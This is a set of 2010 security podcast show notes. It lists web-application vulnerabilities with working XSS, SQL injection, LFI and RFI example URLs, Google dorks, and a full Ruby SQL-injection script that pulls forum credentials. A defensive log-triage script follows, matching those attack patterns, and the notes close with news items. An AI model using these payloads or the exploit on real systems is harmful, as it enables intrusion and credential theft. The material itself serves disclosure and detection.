ISD Podcast Episode 114 for April 22, 2010. This podcast is our contribution back to the community, where we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.
Announcements:
MyHardDriveDied.com:
- MHDD Data Recovery Class current dates and locations:
- San Diego – May 10th-14th
- San Francisco – June 14th-18th
- Atlanta – July 12th-16th
- Chicago – September 13th-17th
- Dallas, TX – October 11th-15th
- Washington DC – December 6th-10th
- Cost is $3500 for all classes. To reserve and register, call (678) 445-9007, email smoulton@nicservices.com or go to http://www.myharddrivedied.com
SANS Community Atlanta:
- SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)
SANS Mentoring Program:
- Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)
Atlanta ISSA:
- Atlanta Secureworld Expo April 27 – 28, 2010 Cobb Galleria Centre (http://www.secureworldexpo.com/events/index.php?id=281)
- The ISSA Chapter is hosting a CISSP Workshop from May 26 to August 14 (preparing for the August 15, 2010 exam), 6:00 to 9:00 PM, two sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University. The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training [at] gaissa [dot] org.
- ISSA International Conference – September 16, 2010 (http://www.issa.org/page/?p=105)
Kentuckiana ISSA:
- 6.5 hour Metasploit class on May 8th 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class)
Friends of the Podcast: Webhosting services: WebSpeedway
Vulnerabilities of Interest:
- The MKPortal Contact module is subject to a Cross Site Scripting (XSS) vulnerability. Example URLs are available:
  http://www.sample.com/contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E
  http://www.sample.com/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&output=%3Cscript%3Ealert(1)%3C/script%3E
  http://www.sample.com/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&blocks=%3Cscript%3Ealert(1)%3C/script%3E
- The Joomla Component com_jp_jobs is subject to a SQL Injection vulnerability. Version 1.2.0 is impacted, though others may be as well. Google Dork "inurl:option=com_jp_jobs". Example URL is available:
  http://www.sample.com/index.php?option=com_jp_jobs&view=detail&id=-999999/**/union/**/all/**/select/**/1,2,group_concat(username,char(58),password)v3n0m,4,5,6,7,8,9,10,11,12,13,14/**/from/**/jos_users--
- Blog System is subject to a Local File Inclusion (LFI) vulnerability. Versions older than 1.5 are impacted, though others may be as well. Google Dorks "inurl:category=home", "inurl:category=comments", "inurl:category=lists", "inurl:category=habillage" and "inurl:category=info". Example URLs are available:
  http://www.sample.com/ADMIN/index.php?category=home&action=../../../../../../../../etc/passwd%00
  http://www.sample.com/ADMIN/index.php?category=comments&action=../../../../../../../../etc/passwd%00
  http://www.sample.com/ADMIN/index.php?category=lists&action=../../../../../../../../etc/passwd%00
  http://www.sample.com/ADMIN/index.php?category=habillage&action=../../../../../../../../etc/passwd%00
  http://www.sample.com/ADMIN/index.php?category=info&action=../../../../../../../../etc/passwd%00
- Vieassociative Openmairie is subject to multiple Remote/Local File Inclusion (RFI/LFI) vulnerabilities. Version 1.01 beta is impacted, though others may be as well. Example URLs are available:
  http://www.sample.com/[path]/gen/obj/association.class.php?path_om=[Shell]
  http://www.sample.com/[path]/gen/obj/collectivite.class.php?path_om=[Shell]
  http://www.sample.com/[path]/gen/obj/planning.class.php?path_om=[Shell]
  http://www.sample.com/[path]/gen/obj/rubrique.class.php?path_om=[Shell]
  http://www.sample.com/[path]/gen/obj/assurance.class.php?path_om=[Shell]
  http://www.sample.com/[path]/gen/obj/cotisation.class.php?path_om=[Shell]
  http://www.sample.com/[path]/gen/obj/profil.class.php?path_om=[Shell]
  http://www.sample.com/[path]/gen/obj/utilisateur.class.php?path_om=[Shell]
  http://www.sample.com/[path]/gen/obj/bureau.class.php?path_om=[Shell]
  http://www.sample.com/[path]/gen/obj/droit.class.php?path_om=[Shell]
  http://www.sample.com/[path]/gen/obj/aquartier.class.php?path_om=[Shell]
  http://www.sample.com/[path]/gen/obj/categorie.class.php?path_om=[Shell]
  http://www.sample.com/[path]/gen/obj/fonction.class.php?path_om=[Shell]
  http://www.sample.com/[path]/gen/obj/ressource.class.php?path_om=[Shell]
  http://www.sample.com/[path]/scr/soustab.php?dsn[phptype]=[LFI%00]
- 60cycleCMS (DOCUMENT_ROOT) is subject to a Local File Inclusion (LFI) vulnerability. Version 2.5.2 is impacted, though others may be as well. Example URLs are available:
  http://www.sample.com/60cycleCMS_path/news.php?DOCUMENT_ROOT=[LFI]%00
  http://www.sample.com/60cycleCMS_path/submitComment.php?DOCUMENT_ROOT=[LFI]%00
  http://www.sample.com/60cycleCMS_path/common/sqlConnect.php?DOCUMENT_ROOT=[LFI]%00
- The Joomla Component Jvehicles is subject to a SQL Injection vulnerability. Versions 1.0 and 2.0 are impacted, though others may be as well. Google Dork "inurl:option=com_jvehicles". Example URL is available:
  http://www.sample.com/index.php?option=com_jvehicles&task=agentlisting&aid=31337
- Openurgence vaccin is subject to Local and Remote File Inclusion (LFI/RFI) vulnerabilities. Version 1.03 is impacted, though others may be as well. Example URLs are available:
  http://www.sample.com/gen/obj/collectivite.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/injection.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/utilisateur.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/droit.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/laboratoire.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/vaccin.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/effetsecondaire.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/medecin.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/individu.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/profil.class.php?path_om=[Shell]
  http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00
- Police Municipale Open Main Courante is subject to Local and Remote File Inclusion (LFI/RFI) vulnerabilities. Version 1.01beta is impacted, though others may be as well. Example URLs are available:
  http://www.sample.com/gen/obj/affectation.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/categorie.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/maincourante.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/planning.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/utilisateur.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/affectationportable.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/collectivite.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/mission.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/portable.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/vehicule.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/affectationvehicule.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/droit.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/nature.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/profil.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/agent.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/intervention.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/periode.class.php?path_om=[Shell]
  http://www.sample.com/gen/obj/urgence.class.php?path_om=[Shell]
  http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00
- joelz bulletin board is subject to a SQL Injection vulnerability. Versions older than 0.9.9rc3 are impacted, though others may be as well. Exploit code is available:
  #!/usr/bin/ruby
  #4004-security-project.com
  #Discovered and vulnerability by Easy Laster
  require 'net/http'
  print "\nEnter host name (site.com)->"
  host=gets.chomp
  print "\nEnter script path (/forum/)->"
  path=gets.chomp
  print "\nEnter script path (userid)->"
  userid=gets.chomp
  begin
  dir = "showforum.php?forum=1+and+1=0+union+select+1,2,3,4,5,6,concat(0x23,0x23,0x23,0x23,0x23,username,0x23,0x23,0x23,0x23,0x23),8+from+user+where+erstellerid="+ userid +"--"
  http = Net::HTTP.new(host, 80)
  resp= http.get(path+dir)
  print "\nid -> "+(/#####(.+)#####/).match(resp.body)[1]
  dir = "showforum.php?forum=1+and+1=0+union+select+1,2,3,4,5,6,concat(0x23,0x23,0x23,0x23,0x23,passwort,0x23,0x23,0x23,0x23,0x23),8+from+user+where+erstellerid="+ userid +"--"
  http = Net::HTTP.new(host, 80)
  resp= http.get(path+dir)
  print "\npassword -> "+(/#####(.+)#####/).match(resp.body)[1]
  dir = "showforum.php?forum=1+and+1=0+union+select+1,2,3,4,5,6,concat(0x23,0x23,0x23,0x23,0x23,email,0x23,0x23,0x23,0x23,0x23),8+from+user+where+erstellerid="+ userid +"--"
  http = Net::HTTP.new(host, 80)
  resp= http.get(path+dir)
  print "\nEmail -> "+(/#####(.+)#####/).match(resp.body)[1]
  print "\n#########################################################"
  rescue
  print "\nExploit failed"
  end
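Every entry in the list above leaves the same kind of trace in a web server's access log: a script tag in a query parameter (MKPortal), UNION ... SELECT with /**/ standing in for spaces (the Joomla components, joelz), repeated ../ traversal ending in a %00 null byte (Blog System, 60cycleCMS, the Openmairie soustab.php cases), or a parameter whose value is a remote URL (the path_om RFI cases). The following script is an added example, not code from the podcast or from any of the advisories it summarises. It assumes Apache/Nginx Combined Log Format, decodes and normalises each request target, and tags it with the attack classes it resembles; the log lines, client addresses and host names are constructed for the example.

```python
"""Access-log triage for the attack classes in the list above (XSS, SQL
injection, LFI, RFI). Added example; the sample log lines are constructed."""
import re
from typing import List, Tuple
from urllib.parse import unquote_plus

# Combined Log Format prefix (assumed); only the request target is matched.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# (tag, pattern) pairs applied to the normalised (decoded, lower-cased) target.
RULES = [
    # Reflected XSS: a script tag, a javascript: URL or an inline event handler.
    ("xss", re.compile(r"<\s*script\b|javascript:|\bon(?:error|load|click|mouseover)\s*=")),
    # UNION-based SQLi (/**/ already collapsed to spaces by normalize), or the
    # concat/group_concat helpers used to pack several columns into one row.
    ("sqli", re.compile(r"\bunion\b.{0,40}\bselect\b|\bgroup_concat\s*\(|\bconcat\s*\(\s*0x")),
    # LFI: repeated traversal, a direct /etc/passwd reference, or a null byte.
    ("lfi", re.compile(r"(?:\.\./){2,}|/etc/passwd|\x00")),
    # RFI: a parameter whose value is a remote URL handed to include().
    ("rfi", re.compile(r"=(?:https?|ftp)://")),
]


def normalize(target: str) -> str:
    """Decode URL encoding twice (catches %25xx double encoding), turn MySQL
    inline comments used as whitespace into spaces, and lower-case."""
    decoded = unquote_plus(unquote_plus(target))
    return decoded.replace("/**/", " ").lower()


def classify(target: str) -> List[str]:
    """Return the tag of every rule that matches this request target."""
    text = normalize(target)
    return [tag for tag, rx in RULES if rx.search(text)]


def triage(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Parse each log line and keep (client ip, target, tags) for the hits."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not Combined Log Format; skip rather than guess
        tags = classify(m.group("target"))
        if tags:
            hits.append((m.group("ip"), m.group("target"), tags))
    return hits


# Constructed sample: four requests shaped like the advisories above, one benign.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Apr/2010:10:15:01 +0000] "GET /contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512',
    '203.0.113.5 - - [22/Apr/2010:10:15:07 +0000] "GET /index.php?option=com_jp_jobs&view=detail&id=-1/**/union/**/all/**/select/**/1,2,3 HTTP/1.1" 200 2048',
    '198.51.100.9 - - [22/Apr/2010:10:16:30 +0000] "GET /ADMIN/index.php?category=home&action=../../../../etc/passwd%00 HTTP/1.1" 200 1024',
    '198.51.100.9 - - [22/Apr/2010:10:16:45 +0000] "GET /gen/obj/profil.class.php?path_om=http://203.0.113.77/x.txt HTTP/1.1" 200 300',
    '192.0.2.7 - - [22/Apr/2010:10:17:00 +0000] "GET /index.php?option=com_content&view=article&id=42 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, target, tags in triage(SAMPLE_LOG):
        print(f"{ip} {','.join(tags)} {target}")
```

The double decode and the /**/ collapse are what make the Joomla-style payloads visible; without them a rule that only looks for "union select" with a literal space misses every one of the example URLs above. Rules this simple will also flag legitimate search queries that happen to contain UNION followed by SELECT, so treat the output as a triage list to read alongside the response status and size, not as a block list.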
Stories of Interest:
News item 1: http://www.memphisdailynews.com/editorial/Article.aspx?id=49432
David Kernell, a 22-year-old student at the University of Tennessee, is accused of accessing Sarah Palin's Yahoo! email account by answering her security question and resetting her password, then posting screenshots of the hacked account, which included Bristol Palin's phone number. Bristol Palin, the daughter of former Alaska governor Sarah Palin, testified in a Knoxville, Tenn., court Wednesday that the hacking of her mother's personal email account led to her being pestered by anonymous phone calls. Kernell was apparently asked what he thought of Bristol Palin and replied, "Not my type." Convictions on all four felony charges (identity theft, wire fraud, intentionally accessing Palin's e-mail account without authorization and obstructing an FBI investigation) could send Kernell to prison for up to 50 years.
News item 2: http://www.zdnet.co.uk/news/security-threats/2010/04/16/security-researchers-demo-cisco-wi-fi-flaws-40088653/
Two generations of Cisco wireless LAN equipment contain a range of vulnerabilities, researchers have told the Black Hat security conference. Enno Rey and Daniel Mende from German testing firm ERNW demonstrated how to hack into two separate generations of Cisco Wi-Fi kit, and said that the flaws were fairly easy to find and exploit. In a presentation called 'Hacking Cisco Enterprise WLANs' on Wednesday, the researchers demonstrated an attack aimed at Cisco's first-generation equipment, the Cisco Structured Wireless Aware Network (Swan). The researchers said it was possible to launch denial of service attacks and to sniff encrypted traffic on Swan by exploiting weaknesses in Cisco's Wireless LAN Context Control Protocol (WLCCP), the protocol that defines how information is sent between wireless access points. Swan access points transfer keys between them to facilitate roaming. Rey said that Leap, the authentication protocol used in Cisco's equipment, was weak, meaning that the cryptography used to hide the keys could be broken.
News item 3: http://vil.nai.com/vil/5958_false.htm
From McAfee's statement: "McAfee identified a new threat that impacts Windows PCs. Researchers worked diligently to address this threat that attacks critical Windows system executables and buries itself deep into a computer's memory. The McAfee research team created detection and removal to address this threat. The remediation passed our quality testing and was released with the 5958 virus definition file at 2:00 PM GMT+1 (6am Pacific Time) on Wednesday, April 21." Not long after that, reports began to surface that Windows PCs, primarily Windows XP SP3 machines, were experiencing significant issues, including constant rebooting or the ever-popular BSOD (blue screen of death) system crash. A number of customers experienced a false positive, resulting in the ensuing chaos. The 5958 virus definitions apparently detect svchost.exe, a core system file on Windows PCs, as a malware threat. According to the McAfee statement, though, "corporations who kept a feature called 'Scan Processes on Enable' in McAfee VirusScan Enterprise disabled, as it is by default, were not affected." McAfee responded by quickly pulling the faulty update from its servers. An emergency extra.dat file was made available in the McAfee forums to address the issue, but the forums site was so overwhelmed with customer backlash that it was eventually taken offline. A corrected virus definition file, 5959, is now available, and McAfee has posted instructions to recover affected systems.